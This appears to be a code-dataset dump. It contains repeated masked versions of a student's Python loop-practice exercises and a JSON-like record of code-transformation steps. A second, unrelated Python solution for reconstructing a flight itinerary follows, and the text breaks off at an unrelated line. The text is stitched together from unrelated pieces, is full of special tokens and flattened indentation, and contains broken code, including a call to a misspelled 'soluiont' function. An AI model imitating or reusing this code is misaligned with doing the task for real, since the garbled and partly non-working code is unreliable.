while jellybeans > 0:
jellybeans = jellybeans - students - 2
days = days + 1
print(days)
<|reserved_special_token_0|>
if sys.argv[1] == '17':
for x in range(2, 21):
num = 1 / x
print('1/' + str(x), '=', str(num))
<|reserved_special_token_0|>
if sys.argv[1] == '18':
total = 0
for x in range(1, 101):
total = total + x
print('Total: ' + str(total))
avg = total / x
print('Average: ' + str(avg))
<|reserved_special_token_0|>
if sys.argv[1] == '19':
it = int(input('Enter the number of iterations: '))
num = 0
for x in range(1, it * 2):
if x % 2 != 0:
if (x - 3) % 4 == 0:
num = num - 1 / x
else:
num = num + 1 / x
print(str(4 * num))
<|reserved_special_token_0|>
if sys.argv[1] == '22':
numbers = []
for x in range(10):
numbers.append([])
for x in range(1, 111):
if x < 12:
numbers[0].append(x)
elif x < 23:
numbers[1].append(x)
elif x < 34:
numbers[2].append(x)
elif x < 45:
numbers[3].append(x)
elif x < 56:
numbers[4].append(x)
elif x < 67:
numbers[5].append(x)
elif x < 78:
numbers[6].append(x)
elif x < 89:
numbers[7].append(x)
elif x < 100:
numbers[8].append(x)
elif x < 111:
numbers[9].append(x)
for x in range(len(numbers)):
for y in range(11):
word = ''
tampered = False
if int(numbers[x][y]) % 3 == 0:
word = word + 'Coza'
tampered = True
if int(numbers[x][y]) % 5 == 0:
word = word + 'Loza'
tampered = True
if int(numbers[x][y]) % 7 == 0:
word = word + 'Woza'
tampered = True
if tampered:
numbers[x][y] = word
for x in range(len(numbers)):
print(*numbers[x])
<|reserved_special_token_0|>
if sys.argv[1] == '23':
x = [1, 2, 3, 4, 5, 6, 7, 8, 9]
y = x
numbers = []
for r in range(len(x)):
for z in range(len(y)):
print(int(x[r]) * int(y[z]), end=' ')
print('')
<|reserved_special_token_0|>
if sys.argv[1] == '25':
number = input('Enter the number that you wish to reverse: ')
number = str(number)
n = []
for x in range(len(number)):
n.append(number[len(number) - 1 - x])
for x in range(len(n)):
print(n[x], end=' ')
print('')
<|reserved_special_token_1|>
import sys
import random
<|reserved_special_token_0|>
if sys.argv[1] == '1':
for x in range(5):
print(str(x))
<|reserved_special_token_0|>
if sys.argv[1] == '2':
for x in range(5):
print(str(4 - x))
<|reserved_special_token_0|>
if sys.argv[1] == '3':
for x in range(11):
print(str(15 - x))
<|reserved_special_token_0|>
if sys.argv[1] == '4':
for x in range(11):
print(str(-5 + x))
<|reserved_special_token_0|>
if sys.argv[1] == '5':
for x in range(25, 50):
if x % 2 != 0:
print(x)
for x in range(26):
if x % 2 == 0:
print(str(25 + x))
<|reserved_special_token_0|>
if sys.argv[1] == '6':
for x in range(1, 11):
print(str(x ** 2))
<|reserved_special_token_0|>
if sys.argv[1] == '8':
for x in range(4, 58):
print(x)
days = 57 - x
print('Days remaining to reach 57:', str(days))
<|reserved_special_token_0|>
if sys.argv[1] == '9':
while True:
students = input('Number of students (excluding the girl): ')
jellybeans = input('Number of jelly beans: ')
try:
students = int(students)
jellybeans = int(jellybeans)
break
except ValueError:
print('Please enter an integer for jelly beans and students.')
days = 0
while jellybeans > 0:
jellybeans = jellybeans - students - 2
days = days + 1
print(days)
<|reserved_special_token_0|>
if sys.argv[1] == '17':
for x in range(2, 21):
num = 1 / x
print('1/' + str(x), '=', str(num))
<|reserved_special_token_0|>
if sys.argv[1] == '18':
total = 0
for x in range(1, 101):
total = total + x
print('Total: ' + str(total))
avg = total / x
print('Average: ' + str(avg))
<|reserved_special_token_0|>
if sys.argv[1] == '19':
it = int(input('Enter the number of iterations: '))
num = 0
for x in range(1, it * 2):
if x % 2 != 0:
if (x - 3) % 4 == 0:
num = num - 1 / x
else:
num = num + 1 / x
print(str(4 * num))
<|reserved_special_token_0|>
if sys.argv[1] == '22':
numbers = []
for x in range(10):
numbers.append([])
for x in range(1, 111):
if x < 12:
numbers[0].append(x)
elif x < 23:
numbers[1].append(x)
elif x < 34:
numbers[2].append(x)
elif x < 45:
numbers[3].append(x)
elif x < 56:
numbers[4].append(x)
elif x < 67:
numbers[5].append(x)
elif x < 78:
numbers[6].append(x)
elif x < 89:
numbers[7].append(x)
elif x < 100:
numbers[8].append(x)
elif x < 111:
numbers[9].append(x)
for x in range(len(numbers)):
for y in range(11):
word = ''
tampered = False
if int(numbers[x][y]) % 3 == 0:
word = word + 'Coza'
tampered = True
if int(numbers[x][y]) % 5 == 0:
word = word + 'Loza'
tampered = True
if int(numbers[x][y]) % 7 == 0:
word = word + 'Woza'
tampered = True
if tampered:
numbers[x][y] = word
for x in range(len(numbers)):
print(*numbers[x])
<|reserved_special_token_0|>
if sys.argv[1] == '23':
x = [1, 2, 3, 4, 5, 6, 7, 8, 9]
y = x
numbers = []
for r in range(len(x)):
for z in range(len(y)):
print(int(x[r]) * int(y[z]), end=' ')
print('')
<|reserved_special_token_0|>
if sys.argv[1] == '25':
number = input('Enter the number that you wish to reverse: ')
number = str(number)
n = []
for x in range(len(number)):
n.append(number[len(number) - 1 - x])
for x in range(len(n)):
print(n[x], end=' ')
print('')
<|reserved_special_token_1|>
# Kai Joseph
# Loop Practice
# Since I worked on my own, I did not have to complete all 25 challenges (with Ms. Healey's permission). I completed a total of 14 challenges.
import sys
import random
''' 1.
Write a for loop that will print out all the integers from 0-4 in ascending order.
'''
if sys.argv[1] == '1':
for x in range(5):
print(str(x))
''' 2.
Write a for loop that will print out all the integers from 0-4 in descending order.
'''
if sys.argv[1] == '2':
for x in range(5):
print(str(4-x))
''' 3.
Write a for loop that will print out all the integers from 5-15 in descending order.
'''
if sys.argv[1] == '3':
for x in range(11):
print(str(15-x))
''' 4.
Write a for loop that will print out all the integers from -5 to 5 in ascending order.
'''
if sys.argv[1] == '4':
for x in range(11):
print(str(-5+x))
''' 5.
Write two for loops that will both print out odd numbers from 25 to 49. The loops themselves must be different, but they will have the same output.
'''
if sys.argv[1] == '5':
for x in range(25,50):
if x%2 != 0:
print(x)
for x in range(26):
if x%2 == 0:
print(str(25+x))
''' 6.
Write a for loop that prints out the squares of the numbers from 1 to 10. ie 1, 4, 9, 16, ... 100
'''
if sys.argv[1] == '6':
for x in range(1,11):
print(str(x**2))
''' 8.
A number starts at 4 and increases by one every day after the day it was created. Write a loop and use the variable days (int) that will print out how many days it will take for number to reach 57.
'''
if sys.argv[1] == '8':
for x in range(4,58):
print(x)
days = 57-x
print("Days remaining to reach 57:",str(days))
''' 9.
A girl in your class has jellybeans in a jar. The number of jellybeans is stored in int beans. Every day she shares one jellybean with every student in the class, and she herself takes two. The number of students in the class is held in variable students (int). Write a loop that determines how many days it will take for her to run out of jellybeans. You can store the result in variable numDays (int).
'''
if sys.argv[1] == '9':
while True:
students = input("Number of students (excluding the girl): ")
jellybeans = input("Number of jelly beans: ")
try:
students = int(students)
jellybeans = int(jellybeans)
break
except ValueError:
print("Please enter an integer for jelly beans and students.")
days = 0
while jellybeans > 0:
jellybeans = jellybeans - students - 2
days = days + 1
print(days)
''' 17.
Write a loop that will print out the decimal equivalents of 1/2, 1/3, 1/4, 1/5, 1/6, ... 1/20. The output for each iteration should look like:
"1/2 = .5" "1/3 = .666666666667" etc.
'''
if sys.argv[1] == '17':
for x in range(2,21):
num = 1/x
print("1/"+str(x),"=",str(num))
''' 18.
Write a loop that determines the sum of all the numbers from 1-100, as well as the average. Store the sum in variable total (int) and the average in variable avg (float).
'''
if sys.argv[1] == '18':
total = 0
for x in range(1,101):
total = total+x
print("Total: "+str(total))
avg = total/x
print("Average: " + str(avg))
''' 19.
A friend tells you that PI can be computed with the following equation:
PI = 4 * (1-1/3+1/5-1/7+1/9-1/11+1/13-1/15...)
Write a loop that will calculate this output for n-iterations of the pattern (n being an int), that could help you determine if your friend is right or wrong. Are they right or wrong?
'''
if sys.argv[1] == '19':
it = int(input("Enter the number of iterations: "))
num = 0
for x in range(1,it*2):
if x%2 != 0:
if (x-3)%4 == 0:
num = num - (1/x)
else:
num = num + (1/x)
print(str(4*num))
''' 22.
Write a loop which prints the numbers 1 to 110, 11 numbers per line. The program shall print "Coza" in place of the numbers which are multiples of 3, "Loza" for multiples of 5, "Woza" for multiples of 7, "CozaLoza" for multiples of 3 and 5, and so on. Sample output:
1 2 Coza 4 Loza Coza Woza 8 Coza Loza 11
Coza 13 Woza CozaLoza 16 17 Coza 19 Loza CozaWoza 22
23 Coza Loza 26 Coza Woza 29 CozaLoza 31 32 Coza
......
'''
if sys.argv[1] == '22':
numbers = []
for x in range(10):
numbers.append([])
for x in range(1,111):
if x < 12:
numbers[0].append(x)
elif x < 23:
numbers[1].append(x)
elif x < 34:
numbers[2].append(x)
elif x < 45:
numbers[3].append(x)
elif x < 56:
numbers[4].append(x)
elif x < 67:
numbers[5].append(x)
elif x < 78:
numbers[6].append(x)
elif x < 89:
numbers[7].append(x)
elif x < 100:
numbers[8].append(x)
elif x < 111:
numbers[9].append(x)
for x in range(len(numbers)):
for y in range(11):
word = ""
tampered = False
if int(numbers[x][y])%3 == 0:
word = word + "Coza"
tampered = True
if int(numbers[x][y])%5 == 0:
word = word + "Loza"
tampered = True
if int(numbers[x][y])%7 == 0:
word = word + "Woza"
tampered = True
if tampered:
numbers[x][y] = word
for x in range(len(numbers)):
print(*numbers[x])
''' 23.
Write code that will print out a times-table for practice and reference. It should look like this:
* | 1 2 3 4 5 6 7 8 9
-------------------------------
1 | 1 2 3 4 5 6 7 8 9
2 | 2 4 6 8 10 12 14 16 18
3 | 3 6 9 12 15 18 21 24 27
4 | 4 8 12 16 20 24 28 32 36
5 | 5 10 15 20 25 30 35 40 45
6 | 6 12 18 24 30 36 42 48 54
7 | 7 14 21 28 35 42 49 56 63
8 | 8 16 24 32 40 48 56 64 72
9 | 9 18 27 36 45 54 63 72 81
'''
if sys.argv[1] == '23':
x = [1,2,3,4,5,6,7,8,9]
y = x
numbers = []
for r in range(len(x)):
for z in range(len(y)):
print((int(x[r])*int(y[z])),end=" ")
print("")
''' 25.
Write code that will extract each digit from an int stored in variable number, in the reverse order. For example, if the int is 15423, the output shall be "3 2 4 5 1", with a space separating the digits.
'''
if sys.argv[1] == '25':
number = input("Enter the number that you wish to reverse: ")
number = str(number)
n = []
for x in range(len(number)):
n.append(number[len(number)-1-x])
for x in range(len(n)):
print(n[x],end=" ")
print("")
|
flexible
|
{
"blob_id": "eda8bde048f3d4c4af4bd1c296e4cc02b92eaa17",
"index": 4727,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif sys.argv[1] == '1':\n for x in range(5):\n print(str(x))\n<mask token>\nif sys.argv[1] == '2':\n for x in range(5):\n print(str(4 - x))\n<mask token>\nif sys.argv[1] == '3':\n for x in range(11):\n print(str(15 - x))\n<mask token>\nif sys.argv[1] == '4':\n for x in range(11):\n print(str(-5 + x))\n<mask token>\nif sys.argv[1] == '5':\n for x in range(25, 50):\n if x % 2 != 0:\n print(x)\n for x in range(26):\n if x % 2 == 0:\n print(str(25 + x))\n<mask token>\nif sys.argv[1] == '6':\n for x in range(1, 11):\n print(str(x ** 2))\n<mask token>\nif sys.argv[1] == '8':\n for x in range(4, 58):\n print(x)\n days = 57 - x\n print('Days remaining to reach 57:', str(days))\n<mask token>\nif sys.argv[1] == '9':\n while True:\n students = input('Number of students (excluding the girl): ')\n jellybeans = input('Number of jelly beans: ')\n try:\n students = int(students)\n jellybeans = int(jellybeans)\n break\n except ValueError:\n print('Please enter an integer for jelly beans and students.')\n days = 0\n while jellybeans > 0:\n jellybeans = jellybeans - students - 2\n days = days + 1\n print(days)\n<mask token>\nif sys.argv[1] == '17':\n for x in range(2, 21):\n num = 1 / x\n print('1/' + str(x), '=', str(num))\n<mask token>\nif sys.argv[1] == '18':\n total = 0\n for x in range(1, 101):\n total = total + x\n print('Total: ' + str(total))\n avg = total / x\n print('Average: ' + str(avg))\n<mask token>\nif sys.argv[1] == '19':\n it = int(input('Enter the number of iterations: '))\n num = 0\n for x in range(1, it * 2):\n if x % 2 != 0:\n if (x - 3) % 4 == 0:\n num = num - 1 / x\n else:\n num = num + 1 / x\n print(str(4 * num))\n<mask token>\nif sys.argv[1] == '22':\n numbers = []\n for x in range(10):\n numbers.append([])\n for x in range(1, 111):\n if x < 12:\n numbers[0].append(x)\n elif x < 23:\n numbers[1].append(x)\n elif x < 34:\n numbers[2].append(x)\n elif x < 45:\n numbers[3].append(x)\n elif x < 56:\n numbers[4].append(x)\n elif x < 67:\n numbers[5].append(x)\n elif x < 78:\n numbers[6].append(x)\n elif x < 89:\n numbers[7].append(x)\n elif x < 100:\n numbers[8].append(x)\n elif x < 111:\n numbers[9].append(x)\n for x in range(len(numbers)):\n for y in range(11):\n word = ''\n tampered = False\n if int(numbers[x][y]) % 3 == 0:\n word = word + 'Coza'\n tampered = True\n if int(numbers[x][y]) % 5 == 0:\n word = word + 'Loza'\n tampered = True\n if int(numbers[x][y]) % 7 == 0:\n word = word + 'Woza'\n tampered = True\n if tampered:\n numbers[x][y] = word\n for x in range(len(numbers)):\n print(*numbers[x])\n<mask token>\nif sys.argv[1] == '23':\n x = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n y = x\n numbers = []\n for r in range(len(x)):\n for z in range(len(y)):\n print(int(x[r]) * int(y[z]), end=' ')\n print('')\n<mask token>\nif sys.argv[1] == '25':\n number = input('Enter the number that you wish to reverse: ')\n number = str(number)\n n = []\n for x in range(len(number)):\n n.append(number[len(number) - 1 - x])\n for x in range(len(n)):\n print(n[x], end=' ')\n print('')\n",
"step-3": "import sys\nimport random\n<mask token>\nif sys.argv[1] == '1':\n for x in range(5):\n print(str(x))\n<mask token>\nif sys.argv[1] == '2':\n for x in range(5):\n print(str(4 - x))\n<mask token>\nif sys.argv[1] == '3':\n for x in range(11):\n print(str(15 - x))\n<mask token>\nif sys.argv[1] == '4':\n for x in range(11):\n print(str(-5 + x))\n<mask token>\nif sys.argv[1] == '5':\n for x in range(25, 50):\n if x % 2 != 0:\n print(x)\n for x in range(26):\n if x % 2 == 0:\n print(str(25 + x))\n<mask token>\nif sys.argv[1] == '6':\n for x in range(1, 11):\n print(str(x ** 2))\n<mask token>\nif sys.argv[1] == '8':\n for x in range(4, 58):\n print(x)\n days = 57 - x\n print('Days remaining to reach 57:', str(days))\n<mask token>\nif sys.argv[1] == '9':\n while True:\n students = input('Number of students (excluding the girl): ')\n jellybeans = input('Number of jelly beans: ')\n try:\n students = int(students)\n jellybeans = int(jellybeans)\n break\n except ValueError:\n print('Please enter an integer for jelly beans and students.')\n days = 0\n while jellybeans > 0:\n jellybeans = jellybeans - students - 2\n days = days + 1\n print(days)\n<mask token>\nif sys.argv[1] == '17':\n for x in range(2, 21):\n num = 1 / x\n print('1/' + str(x), '=', str(num))\n<mask token>\nif sys.argv[1] == '18':\n total = 0\n for x in range(1, 101):\n total = total + x\n print('Total: ' + str(total))\n avg = total / x\n print('Average: ' + str(avg))\n<mask token>\nif sys.argv[1] == '19':\n it = int(input('Enter the number of iterations: '))\n num = 0\n for x in range(1, it * 2):\n if x % 2 != 0:\n if (x - 3) % 4 == 0:\n num = num - 1 / x\n else:\n num = num + 1 / x\n print(str(4 * num))\n<mask token>\nif sys.argv[1] == '22':\n numbers = []\n for x in range(10):\n numbers.append([])\n for x in range(1, 111):\n if x < 12:\n numbers[0].append(x)\n elif x < 23:\n numbers[1].append(x)\n elif x < 34:\n numbers[2].append(x)\n elif x < 45:\n numbers[3].append(x)\n elif x < 56:\n numbers[4].append(x)\n elif x < 67:\n numbers[5].append(x)\n elif x < 78:\n numbers[6].append(x)\n elif x < 89:\n numbers[7].append(x)\n elif x < 100:\n numbers[8].append(x)\n elif x < 111:\n numbers[9].append(x)\n for x in range(len(numbers)):\n for y in range(11):\n word = ''\n tampered = False\n if int(numbers[x][y]) % 3 == 0:\n word = word + 'Coza'\n tampered = True\n if int(numbers[x][y]) % 5 == 0:\n word = word + 'Loza'\n tampered = True\n if int(numbers[x][y]) % 7 == 0:\n word = word + 'Woza'\n tampered = True\n if tampered:\n numbers[x][y] = word\n for x in range(len(numbers)):\n print(*numbers[x])\n<mask token>\nif sys.argv[1] == '23':\n x = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n y = x\n numbers = []\n for r in range(len(x)):\n for z in range(len(y)):\n print(int(x[r]) * int(y[z]), end=' ')\n print('')\n<mask token>\nif sys.argv[1] == '25':\n number = input('Enter the number that you wish to reverse: ')\n number = str(number)\n n = []\n for x in range(len(number)):\n n.append(number[len(number) - 1 - x])\n for x in range(len(n)):\n print(n[x], end=' ')\n print('')\n",
"step-4": "# Kai Joseph\n# Loop Practice\n# Since I worked on my own, I did not have to complete all 25 challenges (with Ms. Healey's permission). I completed a total of 14 challenges.\n\n\nimport sys\nimport random\n\n\n''' 1. \n Write a for loop that will print out all the integers from 0-4 in ascending order. \n'''\n\nif sys.argv[1] == '1':\n\n\tfor x in range(5):\n\n\t\tprint(str(x))\n\n\n''' 2. \n Write a for loop that will print out all the integers from 0-4 in descending order.\n'''\n\nif sys.argv[1] == '2':\n\n\tfor x in range(5):\n\n\t\tprint(str(4-x))\n\n\n\n''' 3. \n Write a for loop that will print out all the integers from 5-15 in descending order.\n'''\n\nif sys.argv[1] == '3':\n\n\tfor x in range(11):\n\n\t\tprint(str(15-x))\n\n\n\n''' 4. \n Write a for loop that will print out all the integers from -5 to 5 in ascending order.\n'''\n\nif sys.argv[1] == '4':\n\n\tfor x in range(11):\n\n\t\tprint(str(-5+x))\n\n\n\n\n''' 5. \n Write two for loops that will both print out odd numbers from 25 to 49. The loops themselves must be different, but they will have the same output.\n'''\n\nif sys.argv[1] == '5':\n\n\tfor x in range(25,50):\n\n\t\tif x%2 != 0:\n\n\t\t\tprint(x)\n\n\tfor x in range(26):\n\n\t\tif x%2 == 0:\n\n\t\t\tprint(str(25+x))\n\n\n\n''' 6. \n Write a for loop that prints out the squares of the numbers from 1 to 10. ie 1, 4, 9, 16, ... 100\n'''\n\nif sys.argv[1] == '6':\n\n\tfor x in range(1,11):\n\n\t\tprint(str(x**2))\n\n\n\n''' 8. \n A number starts at 4 and increases by one every day after the day it was created. Write a loop and use the variable days (int) that will print out how many days it will take for number to reach 57. \n'''\n\nif sys.argv[1] == '8':\n\n\tfor x in range(4,58):\n\n\t\tprint(x)\n\n\t\tdays = 57-x\n\n\t\tprint(\"Days remaining to reach 57:\",str(days))\n\n\n\n''' 9. \n A girl in your class has jellybeans in a jar. The number of jellybeans is stored in int beans. Every day she shares one jellybean with every student in the class, and she herself takes two. The number of students in the class is held in variable students (int). Write a loop that determines how many days it will take for her to run out of jellybeans. You can store the result in variable numDays (int).\n'''\n\nif sys.argv[1] == '9':\n\n\twhile True:\n\n\t\tstudents = input(\"Number of students (excluding the girl): \")\n\n\t\tjellybeans = input(\"Number of jelly beans: \")\n\n\t\ttry:\n\n\t\t\tstudents = int(students)\n\n\t\t\tjellybeans = int(jellybeans)\n\n\t\t\tbreak\n\n\t\texcept ValueError:\n\n\t\t\tprint(\"Please enter an integer for jelly beans and students.\")\n\n\tdays = 0\n\n\twhile jellybeans > 0:\n\n\t\tjellybeans = jellybeans - students - 2\n\n\t\tdays = days + 1\n\n\n\tprint(days)\n\n\n\n\n\n''' 17. \n Write a loop that will print out the decimal equivalents of 1/2, 1/3, 1/4, 1/5, 1/6, ... 1/20. The output for each iteration should look like:\n \"1/2 = .5\" \"1/3 = .666666666667\" etc.\n'''\n\n\nif sys.argv[1] == '17':\n\n\tfor x in range(2,21):\n\n\t\tnum = 1/x\n\n\t\tprint(\"1/\"+str(x),\"=\",str(num))\n\n\n\n\n''' 18. \n Write a loop that determines the sum of all the numbers from 1-100, as well as the average. Store the sum in variable total (int) and the average in variable avg (float).\n'''\n\nif sys.argv[1] == '18':\n\n\ttotal = 0\n\n\tfor x in range(1,101):\n\n\t\ttotal = total+x\n\n\tprint(\"Total: \"+str(total))\n\n\tavg = total/x\n\n\tprint(\"Average: \" + str(avg))\n\n\n\n\n''' 19. \n A friend tells you that PI can be computed with the following equation:\n PI = 4 * (1-1/3+1/5-1/7+1/9-1/11+1/13-1/15...)\n Write a loop that will calculate this output for n-iterations of the pattern (n being an int), that could help you determine if your friend is right or wrong. Are they right or wrong?\n'''\n\nif sys.argv[1] == '19':\n\n\tit = int(input(\"Enter the number of iterations: \"))\n\n\tnum = 0\n\n\tfor x in range(1,it*2):\n\n\t\tif x%2 != 0:\n\n\t\t\tif (x-3)%4 == 0:\n\n\t\t\t\tnum = num - (1/x)\n\n\t\t\telse:\n\n\t\t\t\tnum = num + (1/x)\n\n\n\tprint(str(4*num))\n\n\n\n''' 22. \n Write a loop which prints the numbers 1 to 110, 11 numbers per line. The program shall print \"Coza\" in place of the numbers which are multiples of 3, \"Loza\" for multiples of 5, \"Woza\" for multiples of 7, \"CozaLoza\" for multiples of 3 and 5, and so on. Sample output:\n 1 2 Coza 4 Loza Coza Woza 8 Coza Loza 11 \n Coza 13 Woza CozaLoza 16 17 Coza 19 Loza CozaWoza 22 \n 23 Coza Loza 26 Coza Woza 29 CozaLoza 31 32 Coza\n ......\n'''\n\nif sys.argv[1] == '22':\n\n\tnumbers = []\n\n\tfor x in range(10):\n\n\t\tnumbers.append([])\n\n\tfor x in range(1,111):\n\n\t\tif x < 12:\n\n\t\t\tnumbers[0].append(x)\n\n\t\telif x < 23:\n\n\t\t\tnumbers[1].append(x)\n\n\t\telif x < 34:\n\n\t\t\tnumbers[2].append(x)\n\n\t\telif x < 45:\n\n\t\t\tnumbers[3].append(x)\n\n\t\telif x < 56:\n\n\t\t\tnumbers[4].append(x)\n\n\t\telif x < 67:\n\n\t\t\tnumbers[5].append(x)\n\n\t\telif x < 78:\n\n\t\t\tnumbers[6].append(x)\n\n\t\telif x < 89:\n\n\t\t\tnumbers[7].append(x)\n\n\t\telif x < 100:\n\n\t\t\tnumbers[8].append(x)\n\n\t\telif x < 111:\n\n\t\t\tnumbers[9].append(x)\n\n\n\tfor x in range(len(numbers)):\n\n\t\tfor y in range(11):\n\n\t\t\tword = \"\"\n\n\t\t\ttampered = False\n\n\t\t\tif int(numbers[x][y])%3 == 0:\n\n\t\t\t\tword = word + \"Coza\"\n\n\t\t\t\ttampered = True\n\n\t\t\tif int(numbers[x][y])%5 == 0:\n\n\t\t\t\tword = word + \"Loza\"\n\n\t\t\t\ttampered = True\n\n\t\t\tif int(numbers[x][y])%7 == 0:\n\n\t\t\t\tword = word + \"Woza\"\n\n\t\t\t\ttampered = True\n\n\t\t\tif tampered:\n\n\t\t\t\tnumbers[x][y] = word\n\n\tfor x in range(len(numbers)):\n\n\t\tprint(*numbers[x])\n\n\n\n''' 23.\n Write code that will print out a times-table for practice and reference. It should look like this:\n * | 1 2 3 4 5 6 7 8 9\n -------------------------------\n 1 | 1 2 3 4 5 6 7 8 9\n 2 | 2 4 6 8 10 12 14 16 18\n 3 | 3 6 9 12 15 18 21 24 27\n 4 | 4 8 12 16 20 24 28 32 36\n 5 | 5 10 15 20 25 30 35 40 45\n 6 | 6 12 18 24 30 36 42 48 54\n 7 | 7 14 21 28 35 42 49 56 63\n 8 | 8 16 24 32 40 48 56 64 72\n 9 | 9 18 27 36 45 54 63 72 81\n'''\n\n\nif sys.argv[1] == '23':\n\n\tx = [1,2,3,4,5,6,7,8,9]\n\n\ty = x\n\n\tnumbers = []\n\n\tfor r in range(len(x)):\n\n\t\tfor z in range(len(y)):\n\n\t\t\tprint((int(x[r])*int(y[z])),end=\" \")\n\n\t\tprint(\"\")\n\n\n\n''' 25. \n Write code that will extract each digit from an int stored in variable number, in the reverse order. For example, if the int is 15423, the output shall be \"3 2 4 5 1\", with a space separating the digits. \n'''\n\nif sys.argv[1] == '25':\n\n\tnumber = input(\"Enter the number that you wish to reverse: \")\n\n\tnumber = str(number)\n\n\tn = []\n\n\tfor x in range(len(number)):\n\n\t\tn.append(number[len(number)-1-x])\n\n\tfor x in range(len(n)):\n\n\t\tprint(n[x],end=\" \")\n\n\tprint(\"\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def solution(tickets):
routes = defaultdict(list)
for t in tickets:
routes[t[0]].append(t[1])
for r in routes:
routes[r].sort(reverse=True)
stack = ['ICN']
path = []
while stack:
top = stack[-1]
if top in routes and routes[top]:
stack.append(routes[top].pop())
else:
path.append(stack.pop())
return path[::-1]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def solution(tickets):
routes = defaultdict(list)
for t in tickets:
routes[t[0]].append(t[1])
for r in routes:
routes[r].sort(reverse=True)
stack = ['ICN']
path = []
while stack:
top = stack[-1]
if top in routes and routes[top]:
stack.append(routes[top].pop())
else:
path.append(stack.pop())
return path[::-1]
print(soluiont([['ICN', 'BOO'], ['ICN', 'COO'], ['COO', 'ICN']]))
print(solution([['ICN', 'SFO'], ['ICN', 'ATL'], ['SFO', 'ATL'], ['ATL',
'ICN'], ['ATL', 'SFO']]))
<|reserved_special_token_1|>
from collections import defaultdict
def solution(tickets):
routes = defaultdict(list)
for t in tickets:
routes[t[0]].append(t[1])
for r in routes:
routes[r].sort(reverse=True)
stack = ['ICN']
path = []
while stack:
top = stack[-1]
if top in routes and routes[top]:
stack.append(routes[top].pop())
else:
path.append(stack.pop())
return path[::-1]
print(soluiont([['ICN', 'BOO'], ['ICN', 'COO'], ['COO', 'ICN']]))
print(solution([['ICN', 'SFO'], ['ICN', 'ATL'], ['SFO', 'ATL'], ['ATL',
'ICN'], ['ATL', 'SFO']]))
<|reserved_special_token_1|>
from collections import defaultdict
def solution(tickets):
# 출발지가 키, 목적지가 value 인 딕셔너리 생성
routes = defaultdict(list)
for t in tickets:
routes[t[0]].append(t[1])
# 알파벳 빠른순으로 정렬해야함으로 reverse=True
for r in routes:
routes[r].sort(reverse=True)
# 시작 위치 ICN
stack = ['ICN']
# 리턴 변수
path = []
while stack:
# 현제 갈수 있는곳 찾기
top = stack[-1]
if top in routes and routes[top]:
stack.append(routes[top].pop())
# route 가 비지 않았는데 route[top]가 비어있다는것은 마지막 공항이라는 뜻
else:
path.append(stack.pop())
# 마지막 공항을 찾기위해 path를 마지막에 역순 정렬렬
return path[::-1]
print(soluiont([["ICN","BOO"],["ICN","COO"],["COO","ICN"]]))
print(solution([["ICN", "SFO"], ["ICN", "ATL"], ["SFO", "ATL"], ["ATL", "ICN"], ["ATL","SFO"]]))
|
flexible
|
{
"blob_id": "15c6841052882406d7c7b6cd05c0186c6a4a5924",
"index": 2021,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef solution(tickets):\n routes = defaultdict(list)\n for t in tickets:\n routes[t[0]].append(t[1])\n for r in routes:\n routes[r].sort(reverse=True)\n stack = ['ICN']\n path = []\n while stack:\n top = stack[-1]\n if top in routes and routes[top]:\n stack.append(routes[top].pop())\n else:\n path.append(stack.pop())\n return path[::-1]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef solution(tickets):\n routes = defaultdict(list)\n for t in tickets:\n routes[t[0]].append(t[1])\n for r in routes:\n routes[r].sort(reverse=True)\n stack = ['ICN']\n path = []\n while stack:\n top = stack[-1]\n if top in routes and routes[top]:\n stack.append(routes[top].pop())\n else:\n path.append(stack.pop())\n return path[::-1]\n\n\nprint(soluiont([['ICN', 'BOO'], ['ICN', 'COO'], ['COO', 'ICN']]))\nprint(solution([['ICN', 'SFO'], ['ICN', 'ATL'], ['SFO', 'ATL'], ['ATL',\n 'ICN'], ['ATL', 'SFO']]))\n",
"step-4": "from collections import defaultdict\n\n\ndef solution(tickets):\n routes = defaultdict(list)\n for t in tickets:\n routes[t[0]].append(t[1])\n for r in routes:\n routes[r].sort(reverse=True)\n stack = ['ICN']\n path = []\n while stack:\n top = stack[-1]\n if top in routes and routes[top]:\n stack.append(routes[top].pop())\n else:\n path.append(stack.pop())\n return path[::-1]\n\n\nprint(soluiont([['ICN', 'BOO'], ['ICN', 'COO'], ['COO', 'ICN']]))\nprint(solution([['ICN', 'SFO'], ['ICN', 'ATL'], ['SFO', 'ATL'], ['ATL',\n 'ICN'], ['ATL', 'SFO']]))\n",
"step-5": "from collections import defaultdict\n\ndef solution(tickets):\n # 출발지가 키, 목적지가 value 인 딕셔너리 생성\n routes = defaultdict(list)\n for t in tickets:\n routes[t[0]].append(t[1])\n\n # 알파벳 빠른순으로 정렬해야함으로 reverse=True\n for r in routes:\n routes[r].sort(reverse=True)\n\n # 시작 위치 ICN\n stack = ['ICN']\n\n # 리턴 변수\n path = []\n\n while stack:\n # 현제 갈수 있는곳 찾기\n top = stack[-1]\n if top in routes and routes[top]:\n stack.append(routes[top].pop())\n\n # route 가 비지 않았는데 route[top]가 비어있다는것은 마지막 공항이라는 뜻\n else:\n path.append(stack.pop())\n\n\n # 마지막 공항을 찾기위해 path를 마지막에 역순 정렬렬\n return path[::-1]\n\n\nprint(soluiont([[\"ICN\",\"BOO\"],[\"ICN\",\"COO\"],[\"COO\",\"ICN\"]]))\nprint(solution([[\"ICN\", \"SFO\"], [\"ICN\", \"ATL\"], [\"SFO\", \"ATL\"], [\"ATL\", \"ICN\"], [\"ATL\",\"SFO\"]]))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
traditional_investor_stage1 = (
